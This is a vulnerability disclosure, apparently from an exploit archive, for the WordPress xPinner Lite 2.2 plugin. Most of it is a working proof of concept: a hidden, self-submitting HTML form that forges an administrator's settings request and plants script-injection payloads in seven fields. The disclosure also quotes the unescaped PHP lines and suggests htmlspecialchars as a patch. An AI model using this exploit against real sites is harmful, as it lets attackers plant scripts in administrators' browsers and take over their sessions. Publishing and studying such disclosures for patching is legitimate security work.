WordPress xPinner Lite 2.2 Cross Site Request Forgery / Cross Site Scripting

`# Exploit Title: Wordpress xPinner Lite CSRF/XSS  
# Exploit Author: Ashiyane Digital security Team  
# Vendor Homepage: https://wordpress.org/plugins/xpinner-lite  
# Software Link: https://downloads.wordpress.org/plugin/xpinner-lite.zip  
# Version: 2.2  
# Tested on: windows 7 /FireFox  
# Date: 2015-09-14  
####################################################  
#Exploit :  
  
<form name="XSS" method="POST"   
action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=xpinner">  
<input type="Hidden" name="pin_limit" value='"><script>alert(/XSS   
1/)</script>' />  
<input type="Hidden" name="limit_older_posts"   
value='"><script>alert(/XSS 2/)</script>' />  
<input type="Hidden" name="image_min"   
value='"><script>alert(/XSS3/)</script>' />  
<input type="Hidden" name="image_max"   
value='"><script>alert(/XSS4/)</script>' />  
<input type="Hidden" name="pinterest_email"   
value='"><script>alert(/XSS 5/)</script>' />  
<input type="Hidden" name="pinterest_password"   
value='"><script>alert(/XSS 6/)</script>' />  
<input type="Hidden" name="&pinterest_board_id"   
value='"><script>alert(/XSS 7/)</script>' />  
<input type="Hidden" name="xpinner_save_changes" value="Save Changes" />  
</form>  
<script language="javascript">  
setTimeout(XSS.submit(),1);  
</script>  
  
####################################################################  
# Vulnerable File : /wp-content/plugins/xpinner-lite/xpinner-lite.php  
# Vulnerable codes: Lines 145,150,156,158,169,173,177  
[145] : <input type="text" naMe="pin_limit" vAlue="<?php echo   
$xpinner_options['pin_limit']; ?>" size="10">  
[150] : <input type="text" name="limit_older_posts" value="<?php echo   
$xpinner_options['limit_older_posts']; ?>" size="10">  
[156] : <input type="text" name="image_min" value="<?php echo   
$xpinner_options['image_min']; ?>" size="2">  
[158] : <input type="text" name="image_max" value="<?php echo   
$xpinner_options['image_max']; ?>" size="2">  
[169] : <input type="text" name="pinterest_email" value="<?php echo   
$xpinner_options['pinterest_email']; ?>" size="30">  
[173] : <input type="text" name="pinterest_password" value="<?php echo   
$xpinner_options['pinterest_password']; ?>" size="30">  
[177] : <input type="text" name="pinterest_board_id" value="<?php echo   
$xpinner_options['pinterest_board_id']; ?>" size="30">  
=================================  
For Patch :  
You Should Use htmlspecialchars For Example :  
[145] : <input type="text" name="pin_limit" value="<?php echo   
htmlspecialchars($xpinner_options['pin_limit']); ?>" size="10">  
##########################################################  
discovered by : Amir.ght(Goldhack)  
`